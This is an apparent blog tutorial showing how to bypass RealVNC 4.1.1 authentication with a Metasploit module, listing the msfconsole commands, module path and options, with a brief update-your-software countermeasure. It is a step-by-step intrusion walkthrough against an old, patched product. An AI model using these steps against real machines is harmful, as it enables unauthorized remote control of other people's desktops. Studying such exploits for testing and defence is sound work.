5 Simple Steps Bypass Real VNC Authentication

5 Simple Steps Bypass Real VNC Authentication


Type : Tutorial

Level : Easy

Victim O.S : Windows XP SP3

Victim Vulnerable Application : RealVNC 4.1.1

Attacker O.S : Backtrack 5 R1

When looking around the web, and look at 1337day.com website I see a new remote exploit there about Real VNC Authentication Bypass. Actually securityfocus.com already describe this vulnerability here.

What is VNC? According to RealVNC website on realvnc.com :

RealVNC provides remote administration control software which lets you see and interact with desktop applications across any network.

RealVNC was life safer for system administrator who didn't too familiar with telnet or SSH, because they can see the desktop in real time, or in short words it looks like you use Remode Desktop Connection that is how RealVNC works.

Requirement :

1. Metasploit framework

Step By Step 5 Simple Steps Bypass Real VNC Authentication:

1. Open your terminal and type msfconsole command to go to your metasploit console.

2. The next step you need to define the exploit you want to use, it was realvnc_41_bypass.

msf > use exploit/multi/vnc/realvnc_41_bypass

3. The main thing you should remember that in this type of attack we didn't need to set up the payload, because we're attacking and bypassing VNC login, so the payload it also should be bring the victim desktop into our computer ๐Ÿ™‚

Let's view the available switch by running show options command :

Real VNC Authentication Bypass Step by Step Tutorial

Information :

autovnc --> automatically launch the VNC viewer

lport --> our local VNC viewer port(port5900 was the default port)

rhost --> target machine(victim computer)

rport --> target port on victim machine(port 5900 was the default port)

4. Set our target by using RHOST switch

msf  auxiliary(realvnc_41_bypass) > set rhost
rhost =>

5. Okay, everything was already set up so great until this step and for the final step was using the exploit command.

Real VNC Authentication Bypass Step by Step Tutorial

Together with that script generated, we also have the victim screen via our local VNC viewer

Real VNC Authentication Bypass Step by Step Tutorial

Yes we're in! ๐Ÿ™‚

Countermeasures :

1. Update your VNC into the newer version, as you can see on securityfocus.com links above the newest version was not vulnerable.

Hope you enjoyed it ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com